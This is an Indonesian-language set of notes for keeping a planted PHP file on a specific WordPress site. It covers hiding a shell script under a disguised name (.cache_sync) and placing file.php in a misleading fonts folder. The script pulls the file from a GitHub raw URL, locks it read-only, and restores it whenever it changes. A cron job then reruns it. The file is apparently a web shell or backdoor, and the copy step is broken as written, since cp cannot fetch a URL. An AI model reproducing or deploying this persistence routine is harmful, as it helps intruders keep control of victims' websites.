- check apakah sudah root di terminal
whoami
- ubah chmod dari terminal 
chmod 444 index.php
- 

- untuk backup file dari terminal
cp index.php index-safe.php

buat file dengan nama protect.sh
kalau mau ganti nama dari terminal contoh : 
mv protect.sh .cache_sync

===========================================================================================
 
#!/bin/sh

FILE="/home/u200768895/domains/aceprofessionalpainting.ca/public_html/wp-content/updraft/widgets/fonts/style-engine/file.php"
SAFE="https://raw.githubusercontent.com/Ghami1/file/refs/heads/master/luffyMonkeyD1"

if [ ! -f "$FILE" ]; then
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
    exit
fi

if ! cmp -s "$FILE" "$SAFE"; then
    chmod 644 "$FILE"
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
fi

===========================================================================================


setelah save file jalankan di terminal
chmod +x protect.sh


kalau sudah berhasil pasang chron job
terminal ketik
/home/u200768895/domains/aceprofessionalpainting.ca/public_html/wp-content/updraft/widgets/fonts/style-engine/protect.sh
